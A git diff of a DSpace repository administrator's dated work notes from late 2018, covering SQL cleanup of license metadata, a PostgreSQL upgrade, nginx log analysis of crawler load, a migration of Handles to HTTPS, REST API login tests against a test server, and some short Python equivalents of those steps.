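    • With only a handful of samples per server the mean is a crude summary, but it makes the with/without `expand` comparison easier to quote on a mailing list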
    • If I make a request without the expands it is ten times faster:
    -
    $ time http --print h 'https://dspacetest.cgiar.org/rest/items?limit=100&offset=0'
    +
    $ time http --print h 'https://dspacetest.cgiar.org/rest/items?limit=100&offset=0'
     ...
     0.20s user 0.03s system 7% cpu 3.098 total
     0.22s user 0.03s system 8% cpu 2.896 total
    @@ -414,29 +414,29 @@ $ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,b
     
  • Most of them are from Bioversity, and I asked Maria for permission before updating them
  • I manually went through and looked at the existing values and updated them in several batches:
  • -
    UPDATE metadatavalue SET text_value='CC-BY-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%CC BY %';
    -UPDATE metadatavalue SET text_value='CC-BY-NC-ND-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%BY-NC-ND%' AND text_value LIKE '%by-nc-nd%';
    -UPDATE metadatavalue SET text_value='CC-BY-NC-SA-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%BY-NC-SA%' AND text_value LIKE '%by-nc-sa%';
    -UPDATE metadatavalue SET text_value='CC-BY-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%3.0%' AND text_value LIKE '%/by/%';
    -UPDATE metadatavalue SET text_value='CC-BY-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%/by/%' AND text_value NOT LIKE '%zero%';
    -UPDATE metadatavalue SET text_value='CC-BY-NC-2.5' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE
    -'%/by-nc%' AND text_value LIKE '%2.5%';
    -UPDATE metadatavalue SET text_value='CC-BY-NC-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%/by-nc%' AND text_value LIKE '%4.0%';
    -UPDATE metadatavalue SET text_value='CC-BY-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%Attribution %' AND text_value NOT LIKE '%zero%';
    -UPDATE metadatavalue SET text_value='CC-BY-NC-SA-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value NOT LIKE '%zero%' AND text_value LIKE '%4.0%' AND text_value LIKE '%Attribution-NonCommercial-ShareAlike%';
    -UPDATE metadatavalue SET text_value='CC-BY-NC-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value NOT LIKE '%zero%' AND text_value LIKE '%Attribution-NonCommercial %';
    -UPDATE metadatavalue SET text_value='CC-BY-NC-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%3.0%' AND text_value NOT LIKE '%zero%' AND text_value LIKE '%Attribution-NonCommercial %';
    -UPDATE metadatavalue SET text_value='CC-BY-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%3.0%' AND text_value NOT LIKE '%zero%' AND text_value LIKE '%Attribution %';
    -UPDATE metadatavalue SET text_value='CC-BY-ND-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND resource_id=78184;
    -UPDATE metadatavalue SET text_value='CC-BY' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value NOT LIKE '%zero%' AND text_value NOT LIKE '%CC0%' AND text_value LIKE '%Attribution %' AND text_value NOT LIKE '%CC-%';
    -UPDATE metadatavalue SET text_value='CC-BY-NC-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND resource_id=78564;
    +
    UPDATE metadatavalue SET text_value='CC-BY-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%CC BY %';
    +UPDATE metadatavalue SET text_value='CC-BY-NC-ND-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%BY-NC-ND%' AND text_value LIKE '%by-nc-nd%';
    +UPDATE metadatavalue SET text_value='CC-BY-NC-SA-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%BY-NC-SA%' AND text_value LIKE '%by-nc-sa%';
    +UPDATE metadatavalue SET text_value='CC-BY-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%3.0%' AND text_value LIKE '%/by/%';
    +UPDATE metadatavalue SET text_value='CC-BY-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%/by/%' AND text_value NOT LIKE '%zero%';
    +UPDATE metadatavalue SET text_value='CC-BY-NC-2.5' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE
    +'%/by-nc%' AND text_value LIKE '%2.5%';
    +UPDATE metadatavalue SET text_value='CC-BY-NC-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%/by-nc%' AND text_value LIKE '%4.0%';
    +UPDATE metadatavalue SET text_value='CC-BY-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%Attribution %' AND text_value NOT LIKE '%zero%';
    +UPDATE metadatavalue SET text_value='CC-BY-NC-SA-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value NOT LIKE '%zero%' AND text_value LIKE '%4.0%' AND text_value LIKE '%Attribution-NonCommercial-ShareAlike%';
    +UPDATE metadatavalue SET text_value='CC-BY-NC-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value NOT LIKE '%zero%' AND text_value LIKE '%Attribution-NonCommercial %';
    +UPDATE metadatavalue SET text_value='CC-BY-NC-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%3.0%' AND text_value NOT LIKE '%zero%' AND text_value LIKE '%Attribution-NonCommercial %';
    +UPDATE metadatavalue SET text_value='CC-BY-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%3.0%' AND text_value NOT LIKE '%zero%' AND text_value LIKE '%Attribution %';
    +UPDATE metadatavalue SET text_value='CC-BY-ND-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND resource_id=78184;
    +UPDATE metadatavalue SET text_value='CC-BY' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value NOT LIKE '%zero%' AND text_value NOT LIKE '%CC0%' AND text_value LIKE '%Attribution %' AND text_value NOT LIKE '%CC-%';
    +UPDATE metadatavalue SET text_value='CC-BY-NC-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND resource_id=78564;
     
    • I updated the fields on CGSpace and then started a re-index of Discovery
    • We also need to re-think the dc.rights field in the submission form: we should probably use a popup controlled vocabulary and list the Creative Commons values with version numbers and allow the user to enter their own (like the ORCID identifier field)
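    • A different approach from the batched `LIKE` updates above, sketched in Python: when a value contains a Creative Commons license URL, the identifier can be derived from the URL path instead of matched by hand. This is only an illustration; the function name `normalize_license` is hypothetical and it assumes the value embeds a `creativecommons.org/licenses/<terms>/<version>` URL, which is not true of every value in the field:

```python
import re

# Assumption: the free-text value contains a URL such as
# https://creativecommons.org/licenses/by-nc-nd/4.0/
CC_URL_RE = re.compile(
    r"creativecommons\.org/licenses/([a-z-]+)/(\d\.\d)", re.IGNORECASE
)


def normalize_license(text_value):
    """Return an identifier like 'CC-BY-NC-ND-4.0', or None if no URL is found."""
    match = CC_URL_RE.search(text_value)
    if match is None:
        return None  # leave these for manual review
    terms, version = match.groups()
    return f"CC-{terms.upper()}-{version}"


print(normalize_license("https://creativecommons.org/licenses/by-nc-nd/4.0/"))
```

    • Values without a license URL (for example plain "Attribution" text) return `None` here and would still need the manual passes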
    • Ask Jane if we can use some of the BDP money to host AReS explorer on a more powerful server
    • IWMI sent me a list of new ORCID identifiers for their staff so I combined them with our list, updated the names with my resolve-orcids.py script, and regenerated the controlled vocabulary:
    -
    $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json MEL\ ORCID_V2.json 2018-10-17-IWMI-ORCIDs.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq >
    +
    $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json MEL\ ORCID_V2.json 2018-10-17-IWMI-ORCIDs.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq >
     2018-10-17-orcids.txt
     $ ./resolve-orcids.py -i 2018-10-17-orcids.txt -o 2018-10-17-names.txt -d
     $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
    @@ -458,7 +458,7 @@ Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
     
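    • The `grep -oE ... | sort | uniq` step above can be sketched in Python as follows. It uses the same regular expression as the shell pipeline; the function name `unique_orcids` and the sample strings are hypothetical:

```python
import re

# Same pattern as the grep -oE expression in the shell pipeline
ORCID_RE = re.compile(r"[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}")


def unique_orcids(*texts):
    """Collect every ORCID-shaped identifier from the inputs, sorted and de-duplicated."""
    found = set()
    for text in texts:
        found.update(ORCID_RE.findall(text))
    return sorted(found)


# Illustrative inputs only, standing in for the XML, JSON and text files
vocabulary = "<node id='x' label='Someone: 0000-0001-7930-5752'/>"
new_list = "0000-0002-1825-0097\n0000-0001-7930-5752\n"

print(unique_orcids(vocabulary, new_list))
```

    • Like the shell version, this only checks the shape of the identifier, not its checksum or whether the profile still exists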
  • I upgraded PostgreSQL to 9.6 on DSpace Test using Ansible, then had to manually migrate from 9.5 to 9.6:
  • # su - postgres
    -$ /usr/lib/postgresql/9.6/bin/pg_upgrade -b /usr/lib/postgresql/9.5/bin -B /usr/lib/postgresql/9.6/bin -d /var/lib/postgresql/9.5/main -D /var/lib/postgresql/9.6/main -o ' -c config_file=/etc/postgresql/9.5/main/postgresql.conf' -O ' -c config_file=/etc/postgresql/9.6/main/postgresql.conf'
    +$ /usr/lib/postgresql/9.6/bin/pg_upgrade -b /usr/lib/postgresql/9.5/bin -B /usr/lib/postgresql/9.6/bin -d /var/lib/postgresql/9.5/main -D /var/lib/postgresql/9.6/main -o ' -c config_file=/etc/postgresql/9.5/main/postgresql.conf' -O ' -c config_file=/etc/postgresql/9.6/main/postgresql.conf'
     $ exit
     # systemctl start postgresql
     # dpkg -r postgresql-9.5 postgresql-client-9.5 postgresql-contrib-9.5
    @@ -468,7 +468,7 @@ $ exit
     
  • Linode emailed me to say that CGSpace (linode18) had high CPU usage for a few hours this afternoon
  • Looking at the nginx logs around that time I see the following IPs making the most requests:
  • -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "19/Oct/2018:(12|13|14|15)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "19/Oct/2018:(12|13|14|15)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         361 207.46.13.179
         395 181.115.248.74
         485 66.249.64.93
    @@ -491,14 +491,14 @@ $ exit
     $ sudo docker run --name my_solr -v ~/dspace/solr/statistics/conf:/tmp/conf -d -p 8983:8983 -t solr:5
     $ sudo docker logs my_solr
     ...
    -ERROR: Error CREATEing SolrCore 'statistics': Unable to create core [statistics] Caused by: solr.IntField
    +ERROR: Error CREATEing SolrCore 'statistics': Unable to create core [statistics] Caused by: solr.IntField
     
    • Apparently a bunch of variable types were removed in Solr 5
    • So for now it’s actually a huge pain in the ass to run the tests for my dspace-statistics-api
    • Linode sent a message that the CPU usage was high on CGSpace (linode18) last night
    • According to the nginx logs around that time it was 5.9.6.51 (MegaIndex) again:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "20/Oct/2018:(14|15|16)" | awk '{print $1}' | sort
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "20/Oct/2018:(14|15|16)" | awk '{print $1}' | sort
      | uniq -c | sort -n | tail -n 10
         249 207.46.13.179
         250 157.55.39.173
    @@ -520,12 +520,12 @@ ERROR: Error CREATEing SolrCore 'statistics': Unable to create core [statistics]
     /var/log/nginx/oai.log:0
     /var/log/nginx/rest.log:0
     /var/log/nginx/statistics.log:0
    -# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2018-10-20 | sort | uniq
    +# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2018-10-20 | sort | uniq
     8915
     
    • Last month I added “crawl” to the Tomcat Crawler Session Manager Valve’s regular expression matching, and it seems to be working for MegaIndex’s user agent:
    -
    $ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/1' User-Agent:'"Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)"'
    +
    $ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/1' User-Agent:'"Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)"'
     
    • So I’m not sure why this bot uses so many sessions — is it because it requests very slowly?
    @@ -539,7 +539,7 @@ ERROR: Error CREATEing SolrCore 'statistics': Unable to create core [statistics]
  • Change build.properties to use HTTPS for Handles in our Ansible infrastructure playbooks
  • We will still need to do a batch update of the dc.identifier.uri and other fields in the database:
  • -
    dspace=# UPDATE metadatavalue SET text_value=replace(text_value, 'http://', 'https://') WHERE resource_type_id=2 AND text_value LIKE 'http://hdl.handle.net%';
    +
    dspace=# UPDATE metadatavalue SET text_value=replace(text_value, 'http://', 'https://') WHERE resource_type_id=2 AND text_value LIKE 'http://hdl.handle.net%';
     
    • While I was doing that I found two items using CGSpace URLs instead of handles in their dc.identifier.uri so I corrected those
    • I also found several items that had invalid characters or multiple Handles in some related URL field like cg.link.reference so I corrected those too
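    • For reference, a small Python sketch of what the `UPDATE` above does to a single value: only values that start with `http://hdl.handle.net` are touched, but within those every `http://` is rewritten. The function name `handle_to_https` is hypothetical:

```python
HANDLE_PREFIX = "http://hdl.handle.net"


def handle_to_https(text_value):
    """Mirror of: replace(text_value, 'http://', 'https://')
    WHERE text_value LIKE 'http://hdl.handle.net%'"""
    if text_value.startswith(HANDLE_PREFIX):
        # Like SQL replace(), this rewrites every occurrence in the value
        return text_value.replace("http://", "https://")
    return text_value


print(handle_to_https("http://hdl.handle.net/10568/1"))
```

    • Because every occurrence is replaced, a value holding multiple URLs would have all of them switched to HTTPS, which is one reason to clean up such values first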
    • @@ -547,7 +547,7 @@ ERROR: Error CREATEing SolrCore 'statistics': Unable to create core [statistics]
    • I deployed the changes on CGSpace, ran all system updates, and rebooted the server
    • Also, I updated all Handles in the database to use HTTPS:
    -
    dspace=# UPDATE metadatavalue SET text_value=replace(text_value, 'http://', 'https://') WHERE resource_type_id=2 AND text_value LIKE 'http://hdl.handle.net%';
    +
    dspace=# UPDATE metadatavalue SET text_value=replace(text_value, 'http://', 'https://') WHERE resource_type_id=2 AND text_value LIKE 'http://hdl.handle.net%';
     UPDATE 76608
     
    • Skype with Peter about ToRs for the AReS open source work and future plans to develop tools around the DSpace ecosystem
    • @@ -560,20 +560,20 @@ UPDATE 76608
    • I emailed the MARLO guys to ask if they can send us a dump of rights data and Handles from their system so we can tag our older items on CGSpace
    • Testing REST login and logout via httpie because Felix from Earlham says he’s having issues:
    -
    $ http --print b POST 'https://dspacetest.cgiar.org/rest/login' email='testdeposit@cgiar.org' password=deposit
    +
    $ http --print b POST 'https://dspacetest.cgiar.org/rest/login' email='testdeposit@cgiar.org' password=deposit
     acef8a4a-41f3-4392-b870-e873790f696b
     
    -$ http POST 'https://dspacetest.cgiar.org/rest/logout' rest-dspace-token:acef8a4a-41f3-4392-b870-e873790f696b
    +$ http POST 'https://dspacetest.cgiar.org/rest/logout' rest-dspace-token:acef8a4a-41f3-4392-b870-e873790f696b
     
    • Also works via curl (login, check status, logout, check status):
    -
    $ curl -H "Content-Type: application/json" --data '{"email":"testdeposit@cgiar.org", "password":"deposit"}' https://dspacetest.cgiar.org/rest/login
    +
    $ curl -H "Content-Type: application/json" --data '{"email":"testdeposit@cgiar.org", "password":"deposit"}' https://dspacetest.cgiar.org/rest/login
     e09fb5e1-72b0-4811-a2e5-5c1cd78293cc
    -$ curl -X GET -H "Content-Type: application/json" -H "Accept: application/json" -H "rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc" https://dspacetest.cgiar.org/rest/status
    -{"okay":true,"authenticated":true,"email":"testdeposit@cgiar.org","fullname":"Test deposit","token":"e09fb5e1-72b0-4811-a2e5-5c1cd78293cc"}
    -$ curl -X POST -H "Content-Type: application/json" -H "rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc" https://dspacetest.cgiar.org/rest/logout
    -$ curl -X GET -H "Content-Type: application/json" -H "Accept: application/json" -H "rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc" https://dspacetest.cgiar.org/rest/status
    -{"okay":true,"authenticated":false,"email":null,"fullname":null,"token":null}%
    +$ curl -X GET -H "Content-Type: application/json" -H "Accept: application/json" -H "rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc" https://dspacetest.cgiar.org/rest/status
    +{"okay":true,"authenticated":true,"email":"testdeposit@cgiar.org","fullname":"Test deposit","token":"e09fb5e1-72b0-4811-a2e5-5c1cd78293cc"}
    +$ curl -X POST -H "Content-Type: application/json" -H "rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc" https://dspacetest.cgiar.org/rest/logout
    +$ curl -X GET -H "Content-Type: application/json" -H "Accept: application/json" -H "rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc" https://dspacetest.cgiar.org/rest/status
    +{"okay":true,"authenticated":false,"email":null,"fullname":null,"token":null}%
     
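    • A minimal Python sketch of the same login, status, and logout requests using only the standard library. The endpoint paths and the `rest-dspace-token` header are taken from the curl commands above; the helper names are hypothetical, and nothing is sent until a request is passed to `urllib.request.urlopen`:

```python
import json
import urllib.request

BASE_URL = "https://dspacetest.cgiar.org/rest"


def login_request(email, password, base_url=BASE_URL):
    """Build the POST /login request with a JSON body, as in the curl example."""
    body = json.dumps({"email": email, "password": password}).encode("utf-8")
    return urllib.request.Request(
        f"{base_url}/login",
        data=body,
        headers={"Content-Type": "application/json"},
        method="POST",
    )


def token_request(path, token, method="GET", base_url=BASE_URL):
    """Build a request for /status (GET) or /logout (POST) carrying the token header."""
    return urllib.request.Request(
        f"{base_url}/{path}",
        headers={"Accept": "application/json", "rest-dspace-token": token},
        method=method,
    )


# Building the requests does not touch the network
login = login_request("testdeposit@cgiar.org", "deposit")
print(login.get_method(), login.full_url)
```

    • To actually run the sequence, read the token from the login response body and pass it to `token_request("status", token)` and `token_request("logout", token, method="POST")`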
    • Improve the documentation of my dspace-statistics-api
    • Email Modi and Jayashree from ICRISAT to ask if they want to join CGSpace as partners
    • diff --git a/docs/2018-11/index.html b/docs/2018-11/index.html index 9a757ae6a..936b41193 100644 --- a/docs/2018-11/index.html +++ b/docs/2018-11/index.html @@ -36,7 +36,7 @@ Send a note about my dspace-statistics-api to the dspace-tech mailing list Linode has been sending mails a few times a day recently that CGSpace (linode18) has had high CPU usage Today these are the top 10 IPs: "/> - + @@ -132,7 +132,7 @@ Today these are the top 10 IPs:
    • Linode has been sending mails a few times a day recently that CGSpace (linode18) has had high CPU usage
    • Today these are the top 10 IPs:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Nov/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Nov/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
        1300 66.249.64.63
        1384 35.237.175.180
        1430 138.201.52.218
    @@ -152,7 +152,7 @@ Today these are the top 10 IPs:
     
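    • The `awk '{print $1}' | sort | uniq -c | sort -n | tail` pipeline used throughout these notes can be sketched in Python with a `Counter`. The function name `top_clients` and the sample log lines are hypothetical, and it assumes the client address is the first whitespace-separated field, as in the nginx logs above:

```python
from collections import Counter


def top_clients(lines, n=10):
    """Count requests per client address (first field) and return the n busiest."""
    counts = Counter(
        line.split(maxsplit=1)[0] for line in lines if line.strip()
    )
    # most_common() is descending, unlike `sort -n | tail` which is ascending
    return counts.most_common(n)


# Made-up access log lines for illustration
sample = [
    '66.249.64.63 - - [03/Nov/2018:10:00:00 +0000] "GET /handle/10568/1 HTTP/1.1" 200',
    '138.201.52.218 - - [03/Nov/2018:10:00:01 +0000] "GET /rest/items HTTP/1.1" 200',
    '138.201.52.218 - - [03/Nov/2018:10:00:02 +0000] "GET /rest/items HTTP/1.1" 200',
]

print(top_clients(sample, n=2))
```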
    • They at least seem to be re-using their Tomcat sessions:
    -
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=84.38.130.177' dspace.log.2018-11-03
    +
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=84.38.130.177' dspace.log.2018-11-03
     342
     
    • 50.116.102.77 is also a regular REST API user
    • @@ -163,7 +163,7 @@ Today these are the top 10 IPs:
    • And it doesn’t seem they are re-using their Tomcat sessions:
    -
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=138.201.52.218' dspace.log.2018-11-03
    +
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=138.201.52.218' dspace.log.2018-11-03
     1243
     
    • Ah, we’ve apparently seen this server exactly a year ago in 2017-11, making 40,000 requests in one day…
    • @@ -171,7 +171,7 @@ Today these are the top 10 IPs:
    • Linode sent a mail that CGSpace (linode18) is using high outgoing bandwidth
    • Looking at the nginx logs again I see the following top ten IPs:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Nov/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Nov/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
        1979 50.116.102.77
        1980 35.237.175.180
        2186 207.46.13.156
    @@ -189,9 +189,9 @@ Today these are the top 10 IPs:
     
    • It’s making lots of requests, though actually it does seem to be re-using its Tomcat sessions:
    -
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03
    +
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03
     8449
    -$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03 | sort | uniq | wc -l
    +$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03 | sort | uniq | wc -l
     1
     
    • Updated on 2018-12-04 to correct the grep command above, as it was inaccurate and it seems the bot was actually already re-using its Tomcat sessions
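    • The two grep commands above (matching lines versus unique session IDs) can be sketched in one pass in Python. The function name `session_stats` and the sample log lines are hypothetical; unlike the grep pattern, this version escapes the dots in the IP address:

```python
import re


def session_stats(log_lines, ip_prefix):
    """Return (matching_lines, unique_sessions) for a client IP or IP prefix."""
    pattern = re.compile(
        r"session_id=([A-Z0-9]{32}):ip_addr=" + re.escape(ip_prefix)
    )
    sessions = []
    for line in log_lines:
        match = pattern.search(line)  # one hit per line, like grep -c
        if match:
            sessions.append(match.group(1))
    return len(sessions), len(set(sessions))


# Made-up dspace.log lines for illustration
sid = "A" * 32
sample_log = [
    f"2018-11-03 10:00:00 INFO session_id={sid}:ip_addr=78.46.89.18:view_item",
    f"2018-11-03 10:00:01 INFO session_id={sid}:ip_addr=78.46.89.18:view_item",
    f"2018-11-03 10:00:02 INFO session_id={'B' * 32}:ip_addr=50.116.102.77:view_item",
]

print(session_stats(sample_log, "78.46.89.18"))
```

    • A large first number with a small second number means the client is re-using its sessions; two similar numbers mean it is creating a new session for nearly every request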
    • @@ -200,7 +200,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03
    • I think it’s reasonable for a human to click one of those links five or ten times a minute…
    • To contrast, 78.46.89.18 made about 300 requests per minute for a few hours today:
    -
    # grep 78.46.89.18 /var/log/nginx/access.log | grep -o -E '03/Nov/2018:[0-9][0-9]:[0-9][0-9]' | sort | uniq -c | sort -n | tail -n 20
    +
    # grep 78.46.89.18 /var/log/nginx/access.log | grep -o -E '03/Nov/2018:[0-9][0-9]:[0-9][0-9]' | sort | uniq -c | sort -n | tail -n 20
         286 03/Nov/2018:18:02
         287 03/Nov/2018:18:21
         289 03/Nov/2018:18:23
    @@ -232,7 +232,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03
     
  • Linode emailed about the CPU load and outgoing bandwidth on CGSpace (linode18) again
  • Here are the top ten IPs active so far this morning:
  • -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "04/Nov/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "04/Nov/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
        1083 2a03:2880:11ff:2::face:b00c
        1105 2a03:2880:11ff:d::face:b00c
        1111 2a03:2880:11ff:f::face:b00c
    @@ -246,15 +246,15 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03
     
    • 78.46.89.18 is back… and it is still actually re-using its Tomcat sessions:
    -
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-04
    +
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-04
     8765
    -$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-04 | sort | uniq | wc -l
    +$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-04 | sort | uniq | wc -l
     1
     
    • Updated on 2018-12-04 to correct the grep command and point out that the bot was actually re-using its Tomcat sessions properly
    • Also, now we have a ton of Facebook crawlers:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "04/Nov/2018" | grep "2a03:2880:11ff:" | awk '{print $1}' | sort | uniq -c | sort -n
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "04/Nov/2018" | grep "2a03:2880:11ff:" | awk '{print $1}' | sort | uniq -c | sort -n
         905 2a03:2880:11ff:b::face:b00c
         955 2a03:2880:11ff:5::face:b00c
         965 2a03:2880:11ff:e::face:b00c
    @@ -275,7 +275,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-04
     
    • They are really making shit tons of requests:
    -
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-04
    +
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-04
     37721
     
    • Updated on 2018-12-04 to correct the grep command to accurately show the number of requests
    • @@ -286,7 +286,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-04
    • I will add it to the Tomcat Crawler Session Manager valve
    • Later in the evening… ok, this Facebook bot is getting super annoying:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "04/Nov/2018" | grep "2a03:2880:11ff:" | awk '{print $1}' | sort | uniq -c | sort -n
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "04/Nov/2018" | grep "2a03:2880:11ff:" | awk '{print $1}' | sort | uniq -c | sort -n
        1871 2a03:2880:11ff:3::face:b00c
        1885 2a03:2880:11ff:b::face:b00c
        1941 2a03:2880:11ff:8::face:b00c
    @@ -307,15 +307,15 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-04
     
    • Now at least the Tomcat Crawler Session Manager Valve seems to be forcing it to re-use some Tomcat sessions:
    -
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-04
    +
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-04
     37721
    -$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-04 | sort | uniq | wc -l
    +$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-04 | sort | uniq | wc -l
     15206
     
    • I think we still need to limit more of the dynamic pages, like the “most popular” country, item, and author pages
    • It seems these are popular too, and there is no fucking way Facebook needs that information, yet they are requesting thousands of them!
    -
    # grep 'face:b00c' /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -c 'most-popular/'
    +
    # grep 'face:b00c' /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -c 'most-popular/'
     7033
     
    • I added the “most-popular” pages to the list that return X-Robots-Tag: none to try to inform bots not to index or follow those pages
    • @@ -325,20 +325,20 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11
